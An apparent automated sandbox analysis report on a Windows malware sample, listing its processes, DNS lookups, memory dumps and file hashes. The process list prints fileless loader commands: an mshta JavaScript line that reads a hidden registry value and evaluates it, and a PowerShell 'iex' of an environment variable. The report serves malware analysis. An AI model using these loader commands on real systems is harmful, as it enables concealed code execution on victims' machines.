N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\821aa0af9b1e448cb190cdb1f525f4b5_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\821aa0af9b1e448cb190cdb1f525f4b5_JaffaCakes118.exe"

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" javascript:RD1LgzP0A="10yXp6";CT0=new%20ActiveXObject("WScript.Shell");gN8hICn="mcm2oW";xEo3g=CT0.RegRead("HKLM\\software\\Wow6432Node\\xo5Iengwng\\ivkcPXlF");F1tUbswb="dJNxfvsMe";eval(xEo3g);XmTJE0Ya6K="Uq1C";

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:hmtbe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4472 --field-trial-handle=2280,i,1836084024518340990,18250262151825427757,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
GB 142.250.187.202:443 tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 28.173.189.20.in-addr.arpa udp

Files

memory/2620-0-0x0000000000400000-0x000000000046C000-memory.dmp

memory/2620-1-0x0000000000AF0000-0x0000000000B2A000-memory.dmp

memory/2620-2-0x0000000000400000-0x000000000046C000-memory.dmp

memory/2620-3-0x0000000002420000-0x00000000024F4000-memory.dmp

memory/2620-7-0x0000000002420000-0x00000000024F4000-memory.dmp

memory/2620-8-0x0000000000400000-0x000000000046C000-memory.dmp

memory/2620-6-0x0000000002420000-0x00000000024F4000-memory.dmp

memory/2620-5-0x0000000002420000-0x00000000024F4000-memory.dmp

memory/2620-4-0x0000000002420000-0x00000000024F4000-memory.dmp

memory/2620-9-0x0000000002420000-0x00000000024F4000-memory.dmp

memory/2620-10-0x0000000002420000-0x00000000024F4000-memory.dmp

memory/4408-13-0x00000000052E0000-0x0000000005316000-memory.dmp

memory/4408-14-0x0000000005A30000-0x0000000006058000-memory.dmp

memory/4408-15-0x00000000058E0000-0x0000000005902000-memory.dmp

memory/4408-16-0x0000000006100000-0x0000000006166000-memory.dmp

memory/4408-17-0x0000000006170000-0x00000000061D6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mttsfjg2.sgw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4408-27-0x0000000006220000-0x0000000006574000-memory.dmp

memory/4408-28-0x0000000006730000-0x000000000674E000-memory.dmp

memory/4408-29-0x0000000006780000-0x00000000067CC000-memory.dmp

memory/4408-30-0x0000000007F00000-0x000000000857A000-memory.dmp

memory/4408-31-0x0000000006C70000-0x0000000006C8A000-memory.dmp